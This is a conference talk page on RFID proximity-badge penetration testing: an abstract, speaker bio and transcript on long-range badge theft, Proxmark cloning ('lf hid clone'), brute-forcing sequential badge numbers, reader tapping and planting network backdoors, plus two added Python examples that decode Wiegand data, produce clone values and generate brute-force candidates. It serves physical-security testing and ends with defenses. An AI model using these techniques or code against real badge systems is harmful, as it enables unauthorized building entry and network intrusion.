RFID Hacking: Live Free or RFID Hard

Formal Metadata

Title: RFID Hacking: Live Free or RFID Hard
Number of Parts: 112
License: CC Attribution 3.0 Unported. You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.

Content Metadata

Abstract
Have you ever attended an RFID hacking presentation and walked away with more questions than answers? This talk will finally provide practical guidance on how RFID proximity badge systems work. We'll cover what you'll need to build out your own RFID physical penetration toolkit, and how to easily use an Arduino microcontroller to weaponize commercial RFID badge readers, turning them into custom, long-range RFID hacking tools. This presentation will NOT weigh you down with theoretical details, discussions of radio frequencies and modulation schemes, or talk of inductive coupling. It WILL serve as a practical guide for penetration testers to understand the attack tools and techniques available to them for stealing and using RFID proximity badge information to gain unauthorized access to buildings and other secure areas. Schematics and Arduino code will be released, and 100 lucky audience members will receive a custom PCB they can insert into almost any commercial RFID reader to steal badge info and conveniently save it to a text file on a microSD card for later use (such as badge cloning). This solution will allow you to read cards from up to 3 feet away, a significant improvement over the few-centimeter range of common RFID hacking tools.

Some of the topics we will explore are:

- Overview of the best RFID hacking tools available for your toolkit
- Stealing RFID proximity badge info from unsuspecting passers-by
- Replaying RFID badge info and creating fake cloned cards
- Brute-forcing higher-privileged badge numbers to gain data center access
- Attacking badge readers and controllers directly
- Planting PwnPlugs, Raspberry Pis, and similar devices as physical backdoors to maintain internal network access
- Creating custom RFID hacking tools using the Arduino
- Defending yourself from RFID hacking threats

This DEMO-rich presentation will benefit both newcomers and seasoned professionals of the physical penetration testing field.
Francis Brown (@security_snacks) CISA, CISSP, MCSE, is a Managing Partner at Bishop Fox (formerly Stach & Liu), a security consulting firm providing IT security services to the Fortune 1000 and global financial institutions as well as U.S. and foreign governments. Before joining Bishop Fox, Francis served as an IT Security Specialist with the Global Risk Assessment team of Honeywell International where he performed network and application penetration testing, product security evaluations, incident response, and risk assessments of critical infrastructure. Prior to that, Francis was a consultant with the Ernst & Young Advanced Security Centers and conducted network, application, wireless, and remote access penetration tests for Fortune 500 clients. Francis has presented his research at leading conferences such as Black Hat USA, DEF CON, RSA, InfoSec World, ToorCon, and HackCon and has been cited in numerous industry and academic publications. Francis holds a Bachelor of Science and Engineering from the University of Pennsylvania with a major in Computer Science and Engineering and a minor in Psychology. While at Penn, Francis taught operating system implementation, C programming, and participated in DARPA-funded research into advanced intrusion prevention system techniques.
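The badge format this talk is built around, worked through in code: the abstract speaks of stealing 26-bit proximity badge data to a text file and cloning or brute-forcing it, and the transcript walks through a card with facility code 113 and card number 6339, read by the reader as 26 ones and zeros on the Wiegand data lines and stored as 44 bits on the card. The example below is added here and is not the speaker's Arduino code or anything released by Bishop Fox. The parity layout is the standard HID H10301 26-bit format; the 44-bit wrapping follows the layout the speaker reads out of the product manual (six zeros, a one, ten zeros, a sentinel bit, then the format's bits); all function names are this example's own, and the sample pulse list is constructed rather than captured from a reader.

```python
"""Wiegand 26-bit (HID H10301) badge words and their 44-bit HID Prox tag form.

Added example, not code from the talk or from Bishop Fox.  The parity layout is
the standard H10301 26-bit format; the 44-bit wrapping follows the layout the
speaker reads out of the product manual (six zeros, a one, ten zeros, a
sentinel bit, then the format's bits).  Function names are this example's own.
"""


def parity(value: int, nbits: int) -> int:
    """1 if the low `nbits` bits of `value` contain an odd number of ones, else 0."""
    return bin(value & ((1 << nbits) - 1)).count("1") & 1


def encode_wiegand26(facility_code: int, card_number: int) -> int:
    """Pack an 8-bit facility code and 16-bit card number into a 26-bit H10301 word.

    Bit 25: even parity over the 12 data bits after it (FC + top 4 CN bits).
    Bits 24..17: facility code.  Bits 16..1: card number.
    Bit 0: odd parity over the 12 data bits before it (low 12 CN bits).
    """
    if not 0 <= facility_code <= 0xFF:
        raise ValueError("facility code must fit in 8 bits")
    if not 0 <= card_number <= 0xFFFF:
        raise ValueError("card number must fit in 16 bits")
    data = (facility_code << 16) | card_number       # the 24 payload bits
    lead = parity(data >> 12, 12)                     # even parity: 1 only if the high half is odd
    trail = 1 - parity(data, 12)                      # odd parity over the low half
    return (lead << 25) | (data << 1) | trail


def decode_wiegand26(word: int) -> tuple[int, int]:
    """Return (facility_code, card_number); raise ValueError if a parity bit is wrong."""
    if word >> 26:
        raise ValueError("not a 26-bit word")
    data = (word >> 1) & 0xFFFFFF
    if (word >> 25) & 1 != parity(data >> 12, 12):
        raise ValueError("leading (even) parity mismatch")
    if (word & 1) != 1 - parity(data, 12):
        raise ValueError("trailing (odd) parity mismatch")
    return data >> 16, data & 0xFFFF


# The "six zeros and a one" at the top of every 44-bit HID Prox tag value.
HID_LEAD_BIT = 1 << 37


def to_hid_tag(word: int, nbits: int = 26) -> int:
    """Wrap an nbits-wide Wiegand word into the 44-bit value stored on the tag.

    A sentinel 1 sits directly above the word, so its position encodes the
    format length; longer formats grow leftwards into the ten-zero buffer.
    Formats above 36 bits would reach the lead bit and are not modelled here.
    """
    if not 26 <= nbits <= 36 or word >> nbits:
        raise ValueError("word does not fit the declared format length")
    return HID_LEAD_BIT | (1 << nbits) | word


def from_hid_tag(tag: int) -> tuple[int, int]:
    """Return (nbits, word) from a 44-bit tag value, locating the sentinel bit."""
    if tag >> 44 or not tag & HID_LEAD_BIT:
        raise ValueError("not a 44-bit HID Prox tag value")
    body = tag & (HID_LEAD_BIT - 1)
    nbits = body.bit_length() - 1                     # index of the sentinel bit
    if not 26 <= nbits <= 36:
        raise ValueError("unsupported format length")
    return nbits, body & ((1 << nbits) - 1)


def tag_hex(tag: int) -> str:
    """Eleven hex digits, including the leading zero that tools usually drop to show ten."""
    return f"{tag:011x}"


def word_from_pulses(pulses: list[str]) -> tuple[int, int]:
    """Rebuild (nbits, word) from a reader's Wiegand output, MSB first:
    one pulse on DATA1 per 1 bit and one pulse on DATA0 per 0 bit."""
    word = 0
    for line in pulses:
        if line not in ("D0", "D1"):
            raise ValueError(f"unexpected Wiegand line {line!r}")
        word = (word << 1) | int(line == "D1")
    return len(pulses), word


def neighbour_tags(facility_code: int, card_number: int, count: int) -> list[str]:
    """Tag hex for the next `count` sequential card numbers: the ProxBrute-style
    guessing the talk describes for reaching a higher-privilege badge."""
    return [tag_hex(to_hid_tag(encode_wiegand26(facility_code, cn)))
            for cn in range(card_number + 1, card_number + 1 + count)]


# Constructed sample: the 26 pulses a reader would emit for facility 113, card 6339.
SAMPLE_PULSES = ["D1" if b == "1" else "D0" for b in "10111000100011000110000110"]

if __name__ == "__main__":
    nbits, word = word_from_pulses(SAMPLE_PULSES)
    fc, cn = decode_wiegand26(word)
    print(f"{nbits}-bit card, facility code {fc}, card number {cn}")
    print("tag hex for cloning:", tag_hex(to_hid_tag(word, nbits)))   # 02006e23186
    print("next two card numbers:", neighbour_tags(fc, cn, 2))
```

Run stand-alone, the script rebuilds the demo card from the pulse list, prints the hex string in the form the talk's cards.txt file holds (02006e23186, shown as 2006e23186 once the leading zero is dropped) and lists the two tag values a sequential-card-number guess would try next. The parity check in decode_wiegand26 is the one thing worth keeping in any reader-tapping tool: a bit dropped off the DATA0/DATA1 lines fails parity, which separates a mis-read from a badge worth cloning.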
Transcript: English (auto-generated)
Welcome, everybody, to RFID Hacking: Live Free or RFID Hard. My name is Fran Brown. I'm a managing partner at Bishop Fox, formerly Stach & Liu. We just rebranded and have some exciting stuff to show you guys here today. I'm just going to get right into it. Basically, what I want to go over today is practical advice on successfully performing a penetration test of an RFID physical security system.

A little bit of background behind this: about a year ago I was doing an assessment of an electric utility and I needed to get to their SCADA network, which was only accessible from two buildings. So I needed to break into a building. That's how it all started. That was my goal. So I started looking into different RFID presentations that have been given in the past. Unfortunately, there was no Hacking Exposed: RFID that would just let me know what I would need to know to be able to break into a building. So I watched all the past presentations I could find, anything I could find, and after a couple of days I realized I was no closer to achieving my objective than I was when I started. In most of the presentations, the tools weren't released or were more theoretical. They didn't give me exactly what I needed to know to be able to break into a building. So that's what I hope to cover here today. And I'm going to finish up with practical defenses as well, so you know how to protect yourself.

So breaking it down, it's a pretty simple methodology. When I want to do an RFID penetration test, it just boils down to three simple steps. First, steal somebody's badge information without them realizing it while walking by them. Two, take that information and make a clone of their card. And three, go into the building that I want to break into and possibly plant a back door so I don't have to stay there very long. Seems pretty simple. But the thing that I soon realized was that step one was a little bit difficult, because most of the tools out there required you to get within a couple of centimeters to be able to successfully steal someone's badge information out of their pocket or their purse or what have you.

So that led to what I like to call the ass-grabbing method of RFID hacking. I watched these different presentations, YouTube videos, things I've seen in the past where the people go on and on about how insecure it is and how easy it is to steal somebody's badge information, and then they have things like this where they're walking up and grabbing people's asses with a Proxmark run down their sleeve with a big CD-sized antenna, and walking around ass grabbing. I don't know how many -- I see Jonathan Westhues is up there. I don't know how many times you could potentially do that, walk around in a target facility and start grabbing ass before you actually get caught. I imagine maybe once or twice. This wasn't a realistic thing for me. This isn't going to work. I'm not sure what I could do at this point. But there aren't really any tools out there that would allow me to realistically be able to pull this type of attack off. So I started looking into my own custom solutions. With that, I'm going to do a couple of quick videos that I think demonstrate the limitations as well as our tools for stealing, for step one there, and making a clone of a card, just to show how easy it is now to be able to pull this off and steal someone's badge number and then break into a building. Can you guys see that okay? So in this first one, this is kind of demonstrating
-- how many of you are familiar with the Proxmark 3? It's probably the number one tool you could buy. It's actually really great for a lot of purposes. Sorry about that. It's too much for the microphone. But as you'll see here, it also has the problem of distance. This is the Proxmark. This is an RFID hacking tool you could buy, by far the most popular. It's plugged into my laptop here via USB, and then via another cable there's the antenna. And we see that right now we are running the Proxmark and we have it in listening mode. It's trying to read right now. So as we can see, it still does not see the card even at this range. So I'll keep going down. Keep going down. Getting closer to the antenna. Closer still. Until -- there we go. 6339. We have to be within probably about an inch right here before it actually starts picking up the badge information. 6339. So this is not how close you have to get to somebody on their person to be able to effectively use this tool to steal their information, which is a little too close for comfort if you ask me.

So, I mean, how many people here have pulled off successful penetration tests with the Proxmark or whatever existing tools are out there? A handful of people? I guess you could, but you saw the antenna, and it's about the size of a CD, and typically people would run it down their sleeve and have the CD and try to go up and guess where the person has their badge on them to begin with. If you don't know which pocket it is, start feeling around. So I saw a few things where people posted custom solutions that they had done. They didn't really release code or, you know, practical advice on how to put it together. So I kind of had to do my own thing. It will be up on the website tomorrow, but my goal here was to make it so that I can create a tool for security professionals who don't know a lot about RFID or have an electrical engineering background or are going to build their own custom antennas -- your average security professional who wants to be able to perform this kind of pen test, so they can get up and running realistically quickly.

So it would be great if there was a tool for that step one that allowed us to secretly steal this information without having to go up and grab somebody's butt. So as a crazy random happenstance, we do have such a tool. 6339 again. If we look to my left here, this is what I'm calling the Tastic Long Range RFID Stealer from the company Bishop Fox. We see it's a weaponized commercial reader. We'll throw it up there. You can see it's a 26-bit card. And again, facility code 113 and card number 6339. So it puts it to the screen nicely as well. I'm clearly a few feet away right now. And with this, I can steal the information without having to go up and grab somebody's butt.

So taking a little quicker look at what this tool is actually doing and how the circuit board comes into play. I'm going to turn this off. And we can see that it is about a foot by a foot and only an inch deep. Extremely light, portable. It has a missile switch on the back here, which I was using so as not to accidentally turn it on, things like that. It's completely self-powered and portable. So what you would do is take this, put it in your messenger bag or backpack or briefcase, walk around with it, walk by somebody from up to three feet away and pick up their badge information, which is much better than, you know, grabbing butts up here. Now it writes to the screen. But we actually see it's easy to take apart here. Just a single screw in the front, a thumb screw that I can just twist out and take the lid off. What we have here is a long-distance commercial badge reader, the kind that you would find in parking lots so that you don't have to get out of your car. You can just roll down your window and reach your arm out of the car window and hold your badge out and get it picked up. So it's meant to be picked up from several feet away. All of this was in here to begin with. All I did was add the LCD screen, the batteries to self-power it, and you will recognize this circuit board here, which you have without all of the things already installed. It has all the logic; the code behind it will be on our website for you to download as well. And this is just an Arduino controller that you can buy online on Amazon or at Radio Shack, as well as just some resistors and a few things there you can pick up anywhere. We have a lot of detailed instructions on the website on how to recreate this, which is our main goal here. And finally we see we have a microSD card, which not only was it writing to, but it is the next file. So pretty cool. Basically -- thank you. So, you know, for those who are really attached to it, the ass-grabbing methodology is still at your disposal if that's what you want to do. But this I think is a much better solution. And as you can see, it's super light. It's self-powered. Completely portable. Picks it up from a couple of feet away as opposed to a centimeter or two. So effectively this was my attempt at solving step one of those three steps. And then I just have one more video which shows you step two, which
I mentioned. I take the -- the output of it -- and pop it into my laptop. It should come up over here. So we should see the SD card came up that I pulled from our long-range RFID stealer. Check that out. And we see that there's a single file, cards.txt. Just a simple text file. Click on that. And we see here we scanned it a few times. It's a 26-bit card. Here is the hexadecimal notation for that badge information. We actually decoded it for you. It's facility code 113 and badge number 6339, as we saw printed on the card. We actually have the binary as well. So now we've successfully completed step one. We've taken this silent stealing of badge information and made it a realistic possibility where we can, from three feet away, casually walk by you and steal the information.

Now that we have that, we can use tools like the Proxmark to quickly create a cloned, fake version of your badge so that we can go use it. And that is extremely easy. It's a single command. We already have the Proxmark set up here. So what we're going to do is I'm going to go ahead and copy the hexadecimal version of this badge, 6339. Click copy. And we're going to come back to our Proxmark here. Now the Proxmark is in read mode right now. So by hitting this button I'll stop that. So now we have the badge information from our tool, just this hexadecimal value. And what we're going to do is take this programmable T5557 card, which is a programmable card that doesn't read as anything right now. And we can turn this -- this is just a sticky note. It's clearly not the 6339 badge. Let's put a Post-it on there. It's programmable. So I just lay that on top of the antenna here. And if we look right here, all I'm going to do is type in lf, for low frequency; hid, because it's a HID card; clone; space; and then I'm just going to paste in that value we took from our cards.txt file. And hit enter. And we see "cloning tag" with that value that we stole. Done. So right now this card is functionally an exact duplicate of the card that we stole, 6339. So let's test it out.

So we have our original again. Badge number 6339. The original card, 6339. And it's a ProxCard II. Go there. 6339 still. Now we take our clone card, this card which is clearly not that same card. It just has my sticky note on it. And we come up to it. Badge 6339. Facility code 113. 26-bit card. So now we've successfully stolen and made a fake copy of this person's badge. Cool. So pretty easy now, right? Hopefully you guys can get up and running with this kind of tool. And at this point I've been able to train some of our consultants to do it now in about ten minutes. Here's the on switch, which is also the off switch, on the back. You know, go forth and prosper. So with that, what we're talking
about here is low frequency. I saw with some of the articles that came out, people were posting links to high-frequency long-range antennas and things like that. But we're talking about the 125 kilohertz low-frequency technology for physical security systems. And looking at that, people have known about these issues for quite some time. But the interesting thing to me was that no one's really done anything about it yet. This came from HID Global directly, from a post they had recently, saying that 70 to 80% of physical security systems out there still use this legacy low-frequency technology that we're exploiting here, despite us having known for quite some time. And they admit that there's no security; they've been hacked, we know this. They're not resistant to any of these kinds of common attacks, yet they still persist. And just looking at that, one of the motivations behind doing this talk, actually after creating the tools, was I noticed that we see in Chris Paget's talk from 2007: it couldn't be any simpler. If you're using this technology for your doors, you're highly insecure. It's a big bullet, that's it. That's 2007. And those quotes came from this blog post in June of 2013. So from 2007 to 2013, we've made about zero progress in terms of upgrading these physical security systems. And that blog post is actually pretty interesting. It goes on to talk about some of the reasons why. The physical security product life cycle is about 20 years, they estimate. Most of the things out there were bought in the early '90s. HID offers more secure solutions, but people have bought and installed products from 20 years ago and are just more than happy with it. So to some extent it's ignorance on the part of the people making the purchase decisions; they just don't realize that these things are this insecure, as well as there's budget issues.

So what we're looking at here is a basic breakdown of what's happening for a badging system for a door. There's four main components. And coincidentally, if we're thinking about doing a pen test, those are the four areas that we'll want to target. So with this attack, we're targeting the card directly. We're going to the local Starbucks in the building we want to break into, or hanging out in the smoking area or something like that, and targeting the cards that are on somebody's person. These cards, basically, when they come within near distance of a reader like this, the reader powers it and it just starts singing out 26 to 37 ones and zeros. As soon as it gets powered it starts singing this out, depending on what they have. And then the reader just reads these off the air and encodes them in a protocol which I'll talk about in a little bit and forwards them on to the controller to make the decision about whether to open the door or not. And then you have the host PC where the physical security guard will be sitting to add new users and monitor, you know, cameras and things like that.

So in breaking this down, in doing this initial research, it was like pulling teeth. I mean, just trying to understand what was going on with these things, what's written on the card, how far away can I be. Every question that would jump to your mind if you didn't know anything about RFID hacking, it would be like the 130th Google hit or some random product manual that I found the answer in. So I tried to compile as much as I could here to make it easy. But one of the questions that comes up is: if I saw somebody's badge, if I looked at the number on the back, is that enough information for me to make a fake copy of it? You went on Google Images and somebody took a picture and you saw their badge number; could you make a copy of that? Well, the short answer is, maybe. So basically there's 26 to 37 ones and zeros that the card sings out when it comes to your reader. Those eventually get interpreted by a controller, and the way they get interpreted is basically what they call the card format, which typically breaks down into your card ID and a facility code. What's written on the card is the card ID, which is part of what you need. If they're using a standard 26-bit card, then there's only 255 possible facility codes. So technically with that, I could just try that card number and facility code one, facility code two, facility code three, and pretty quickly be able to brute force based on what you visually see on the card. If they've implemented like a 35-bit card or something, then it wouldn't be as easy to do. There's also -- you'll typically see on these cards one number and then a space and then a longer number. That longer number is just a sales order number. I found it in a product manual. If you want to buy more cards, when you call the sales guy, you read them that number. It has nothing to do with authentication or getting you in the door or anything like that. So good to know.

And this is what I'm talking about with the -- so in reading this as well, I saw things from your standard 26-bit card or your corporate 35-bit card. Then you hear that they're 44-bit cards. And then in the Proxmark, you see typically when tools are accessing them, they're 10 hexadecimal digits, which is only 40 bits. So what exactly is going on with the card was a little confusing to me, because people didn't really make it clear. So just to make it clear what's actually going on: it sings out 26 to 37 bits in the air. It's always 44 bits on the card. And when we see here -- I scanned this in from a product manual and put the notation there myself. Typically the -- or always -- the first hexadecimal digit will be a zero, which usually gets dropped, which is why you see it as 10. You see the full version there of 11 hexadecimal digits starting with a zero. So what happens is there's always 44 bits on the card, which you see up there. The standard 26-bit is what you see on the right. And then it starts -- everyone look at that guy with a stare. So it's always, every single card, it starts with six zeros and a one. Every single card. Six zeros and a one. And then there's a buffer of ten zeros and then a parity -- or a sentinel bit -- and then your 26 bits. So if you have a 35-bit card or anything up to 37, all it does is extend to the left there using that buffer of those ten zeros. And that's the full 44 bits that are on the card.
So mystery solved. This is on low‑frequency stuff and mainly for breaking into buildings. But this ‑‑ the type of attacks and the techniques that we're going for here are going to be only become more applicable as we go on. We're starting to see them in credit cards in the U.S. now. Passports and my favorite ‑‑ who here is a Disney
fan? Anybody ‑‑ Disneyland, Disney World? Yeah. So Disney is going over to RFID for everything. So it's going to be fun, experiments, some field research, get some fast passes to get to the front of the lines and things like that. You see the band there
on somebody's wrist. Everything from getting in the front door of Disney World to getting your fast passes for the rides to paying for things to your hotel room are all going to be ‑‑ it's all RFID‑based. They're rolling it out right now. So these things are just ‑‑ people are finding more and more uses for RFID technology that are going to be fun to do pen tests for. A couple of the tools that you want to have
in your arsenal, besides our tool here, I would definitely recommend the Proxmark. You can get cheaper versions but the nice palace version is $3.99. You can use it as we saw in the one video for making clone cards. It has all kinds of purposes
that are great for doing RFID hacking. It does have a single button on it. See that workflow there? One crazy workflow for the single button on top of the Proxmark which is a little fun. It's like stand on one foot and hold the button for four and a half seconds until it blinks red and orange and then hold it longer. That's literally
the one button's workflow, which is pretty cool. Another cool thing with the Proxmark is there's a tool called the Proxbrute. Have any of you guys heard of the Proxbrute before? A handful of people. So the Proxbrute is just custom firmware that someone from McAfee got in Brad released that you can load onto the Proxmark and use it to
do brute forcing. So each of these badges, we saw the card number and facility code. Once you have like a valid badge, if you stole maybe just a normal worker's badge information to get in the front door but you want to get in the data center and that
the card numbers themselves are sequential. So you could use this tool and the Proxmark will simulate being a badge and it will try that number, the next badge number, the next badge number. So it will allow you to brute force a different badge number to get into a data center or more secure area than the actual badge that you stole,
which is great. And it has a similar crazy workflow for that one button which is altered there. Also there's Adam Laurie's stuff, the RF idiot scripts. He has compiled a bunch
of different Python scripts for doing RFID hacking and keeps adding to them for all sorts of different purposes. So I would definitely recommend checking that out as well as one convenience is that the software, it all comes loaded on back track. So all you need to do is get the equipment, plug the USB in and fire up back track and you could be
up and running and doing some stuff pretty quickly. These are extremely cool. Has anyone seen these tools before from RFID? I don't think I've ever seen this in a security presentation on RFID. I happen to just stumble across it. And basically it's just two little USB sticks about that size. It requires no software. It's for field testing,
for people that install this type of equipment. And basically one of the questions that I had that I wanted to answer was, what if I don't know what kind of card this is? What if I don't know what technology it's using? Take the Disney example. The Disney stuff doesn't have identifying ‑‑ it has all Walt Disney stuff on their cards.
It doesn't have what kind of card it actually is. So if I wanted to figure out what technology it was, I would use these things. They have a high frequency and a low frequency USB stick. You plug it in. You open up Notepad. You lay a card on top of it and click print screen. And in Notepad it will tell you not only what the badge
information is, but exactly what technology it is, which matters for being able to understand what kind of tools you're going to need to break into it. So pretty cool. And then, again, this is our tool. Again, we just saw the demonstration of it already. I programmed in there. You see a 35‑bit card. Basically you'll be able to get one
of those circuit boards I'm about to give out, or go to our website ‑‑ it should be up tomorrow ‑‑ download the code that you could send away to anyone that makes circuit boards, and for about 30 bucks they'll send you a copy. Then you buy the
parts that you need, load the code that we have. It will be on our website, and you'll be up and running. You essentially plug this into any RFID reader that there is for any of the technologies. So as we'll see, simple missile switch in the back. Easily from three feet away. I designed it ‑‑ what I'll be releasing,
I designed it in Fritzing. Anybody familiar with Fritzing? I'll be releasing that and you can actually export it to Extended Gerber to send away to get the board. That's a picture of the board that I'll be giving away after the talk. Essentially you could take this
board and it basically has two inputs and two outputs. It's taking in the output of a reader like this one here. It's taking in the batteries, and it's outputting the badge number to a screen and to a text file on the card. That's as simple as you can think of how the board is working. And it's tapping that output of the reader, this
output that I mentioned earlier, which every single badge reader has and typically uses. So there's 26 to 37 ones and zeros. Basically there's data one and data zero. For each one it sends a pulse on data one. For each zero it sends a pulse
on data zero. We're just tapping into that. So essentially you could use this for any type of badge system. So the two main ones for physical security are HID Prox and Indala Prox for the low frequency, which technically are both owned by the company HID at this point. But if I held a HID badge up to an Indala reader it wouldn't
do anything. Or if I held an Indala card up to a HID reader it wouldn't do anything. So between these two long distance readers, one of which you see here, you're pretty much covered with 99% of the badges that people would have out there. So you could take my board, plug it into the HID reader which we have here, and if you notice it's
not working you can plug it into the long distance Indala reader and just walk around and grab people's Indala cards as well. You see the "proven secure" lies written there for Indala. Indala claims to be more secure and they have a lot of people convinced that it is. Instead of just sending out the ones and zeros it does a
little bit of obfuscation, which doesn't even matter because if we're using an actual Indala reader like we are it does all the decoding for you. So it's very easy to do, and we've made fake versions, so both of these are just as susceptible. And finally, with the Arduino I just plugged in an SD card and I'm writing it to a text file
for ease, but there are plenty of Arduino add‑ons that you can imagine, from adding Bluetooth capabilities so I can see the badges on my phone as they're being read, or even cell phone capability to have it text message me every badge
that it sees if I leave it somewhere else. These things would be relatively easy to add on to this type of technology. Basically if you guys are aware of any tools that do this attack you can let me know. I've heard people talk about it in theory
in some Ph.D. papers, but the distance limitation that we're now getting with 3 feet, versus centimeters before, is due to powering the card, not actually reading the ones and zeros that it's sending out. So people have talked about, if you leave something near the front door of an actual building and you let the real reader of that door power their
card, you can listen for those ones and zeros from further away. And I know that in Chris Paget's talk he mentioned being able to get up to 10 feet with this in this passive mode, letting someone else power it. This tool obviously never was released, due to legal reasons I believe, and I haven't seen any other tools that actually successfully do it,
but it is something to be aware of in terms of getting further distance still. Making a copy of the card. I mentioned this in the video. What you would want to get are these T55x7 cards. They're like a dollar. You can buy them online. All these slides,
my note sections are white papers, links to everything you would want for each topic are in there, and I'll have links to where you can buy these. But these things are not blank cards. They're programmable cards. So they'll simulate the data and behavior of any type of card. And what I meant when I mentioned a HID card wouldn't work with Indala and an Indala card wouldn't work with HID: these cards can behave like an Indala
card or a HID card. So they can simulate any type of card and the data on them. They're definitely something you want to have in your arsenal too. You can reprogram them as much as you want to be your fake versions of cards. Finally, if people start using RFID
blocking wallets and stuff like that, we have to move down the line of what we're attacking. There are things out there where you can pop open the lid of the reader and start dumping things off the readers and attacking them directly. There's a man‑in‑the‑middle tool called Gecko where you plug it in the reader and as people badge in, it's writing
them all to something as well. And I didn't really design my circuit board to be used in that way, but I realized afterwards, with a few minor alterations, you could use that circuit board. All I'm doing is tapping into the output of a real reader. You could take that circuit board, go to the front of a building that you're trying to break into, pop the lid off, insert it, and have it sit there and record all the other
real badges that are coming through that reader. So you could use it in this way as well. And this Brad, I'll butcher his last name, Antoniewicz, from McAfee, the guy that actually made that ProxBrute software I'm talking about, he has a project here
that you can see where he's come up with tons of scripts and things to attack the readers and attack the controllers directly, which are pretty cool. I would recommend checking it out. Lastly, once you get in, you want to not be in the building any longer than you have to be. So I recommend ‑‑ any of you familiar with the Pwn Plug? Cool.
So it's just going to be your little personal VPN, your back door into their network. It's $1,000 for the regular Pwn Plug and $1,500 for the Power Pwn. It's pretty cool looking. It's a little hefty. I would recommend ‑‑ a lot of people are coming out with images for the Raspberry Pi that allow them to effectively do the same exact thing. Even
from Pwnie Express, you have the Raspberry Pwn, the Rogue Pi, the Pwn Pi. So for $35 instead of $1,500, you can create your own little back door to be on the network. You see there people use hollowed‑out old laptop chargers, things like that, with the Raspberry Pi in it to be their own little back door, which is pretty cool.
I think we're just about out of time, so I'm going to skip the defenses. Avoid being probed. I don't know if this will help you out or not, but it's very fashionable.
So I would recommend upgrading your systems, if possible, to the contactless smart cards, the high‑frequency stuff. These things can do challenge‑response, authentication, encryption. There are more secure products out there. If you're a company that has 100,000 employees, replacing everybody's badges and every single door out there might be not that realistic,
at least in any kind of good time frame. So in order to get around that, what I would recommend is changing ‑‑ using things like anomaly detection software, so if I badge in at 8 in the morning every morning, but all of a sudden I'm badging in at 4 in the morning in a building I never go to, you can have it generate an alert and
flag you. Also, you have the protective sleeves that I'll talk about more in a second, but you want to not wear your badge in prominent view, so I can't make a realistic looking picture of it. Security screws that prevent people from easily popping the lid off the reader on your door, instead of normal screws. And there's also ‑‑ some of your readers,
you have to check, have tamper‑detect mechanisms that will send an alert if someone is messing with the reader. Finally, the last slide is that those protective sleeves that you would get, some of them work and some of them don't. Before you buy 100,000 of them for your employees, make sure that it works. This is a green card protective sleeve;
one of our employees is from Scotland, very charming fellow, and he has his green card, which has RFID in it, and it has this sleeve that you should keep it in at all times to prevent communication with your card. It doesn't work at all. It's probably just a piece of paper. I don't know how they got away with selling that to the federal government
for every single green card, but it doesn't work at all. And in my experience, there's no rhyme or reason. Half of them work, half of them don't. So get a sample, test it out before you buy them in bulk for your company. And that's it.
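Editor's added example (not part of the talk and not the speaker's released Arduino code): the talk describes tapping a reader's DATA0/DATA1 lines, where each pulse on DATA1 is a 1 bit and each pulse on DATA0 is a 0 bit, and then walking sequential card numbers with the Proxmark to reach a higher-privilege badge. The script below models that pipeline in Python for the standard 26-bit format: it frames a captured pulse log into per-badge bit lists, checks both parity bits and splits out facility code and card number, re-encodes a badge the way a clone must replay it, and generates the sequential brute-force candidates. The 26-bit layout (even parity, 8-bit facility code, 16-bit card number, odd parity) is the common HID H10301 format and is assumed here; the 25 ms frame-gap timeout and the pulse log itself are constructed for the example.

```python
"""Wiegand 26-bit badge data: framing, decode, encode, sequential candidates.

Editor's example, not the speaker's Arduino sketch. Assumes the standard 26-bit
layout (HID H10301): bit 0 is even parity over the following 12 bits, then an
8-bit facility code, a 16-bit card number, and bit 25 is odd parity over the
preceding 12 bits. Other formats (e.g. 35-bit Corporate 1000) lay out differently.
"""
from dataclasses import dataclass
from typing import Iterator, List, Sequence, Tuple

# A captured pulse: the line it fired on ("D0" or "D1") and a timestamp in microseconds.
Pulse = Tuple[str, int]

# Assumed framing rule: readers space pulses roughly 1-2 ms apart, so a gap longer
# than this separates one badge presentation from the next.
FRAME_GAP_US = 25_000


@dataclass(frozen=True)
class Badge:
    facility_code: int  # 0..255 in the 26-bit format
    card_number: int    # 0..65535 in the 26-bit format


def frame_pulses(pulses: Sequence[Pulse], gap_us: int = FRAME_GAP_US) -> List[List[int]]:
    """Split a D0/D1 pulse stream into per-badge bit lists (D1 pulse = 1, D0 pulse = 0)."""
    frames: List[List[int]] = []
    current: List[int] = []
    last_t = None
    for line, t in pulses:
        if last_t is not None and current and t - last_t > gap_us:
            frames.append(current)      # silence ended the previous badge read
            current = []
        if line == "D1":
            current.append(1)
        elif line == "D0":
            current.append(0)
        else:
            raise ValueError(f"unknown Wiegand line {line!r}")
        last_t = t
    if current:
        frames.append(current)
    return frames


def _bits_to_int(bits: Sequence[int]) -> int:
    return int("".join(str(b) for b in bits), 2)


def decode_26bit(bits: Sequence[int]) -> Badge:
    """Verify both parity bits, then extract facility code and card number."""
    if len(bits) != 26:
        raise ValueError(f"expected 26 bits, got {len(bits)}")
    if sum(bits[0:13]) % 2 != 0:        # bit 0 plus bits 1..12 must be even
        raise ValueError("even parity check failed")
    if sum(bits[13:26]) % 2 != 1:       # bits 13..24 plus bit 25 must be odd
        raise ValueError("odd parity check failed")
    return Badge(_bits_to_int(bits[1:9]), _bits_to_int(bits[9:25]))


def encode_26bit(badge: Badge) -> List[int]:
    """Produce the 26 bits a reader emits for this badge, i.e. what a clone replays."""
    if not (0 <= badge.facility_code <= 0xFF and 0 <= badge.card_number <= 0xFFFF):
        raise ValueError("facility code or card number out of range for 26-bit format")
    body = [int(c) for c in f"{badge.facility_code:08b}{badge.card_number:016b}"]
    even = sum(body[:12]) % 2           # makes bits 0..12 even
    odd = 1 - (sum(body[12:]) % 2)      # makes bits 13..25 odd
    return [even] + body + [odd]


def brute_force_candidates(seed: Badge, count: int, step: int = 1) -> Iterator[List[int]]:
    """Yield bit patterns for the `count` card numbers after `seed`, same facility code.

    Sequential card numbers are what make the talk's attack work: keep the stolen
    badge's facility code and step the card number until a privileged one opens the door.
    """
    for i in range(1, count + 1):
        cn = seed.card_number + i * step
        if not 0 <= cn <= 0xFFFF:
            return                      # ran off the end of the 16-bit field
        yield encode_26bit(Badge(seed.facility_code, cn))


def synth_pulses(frames: Sequence[Sequence[int]], period_us: int = 2_000,
                 frame_gap_us: int = 200_000) -> List[Pulse]:
    """Constructed test input: turn bit lists into a plausible D0/D1 pulse log."""
    pulses: List[Pulse] = []
    t = 0
    for bits in frames:
        for b in bits:
            pulses.append(("D1" if b else "D0", t))
            t += period_us
        t += frame_gap_us
    return pulses


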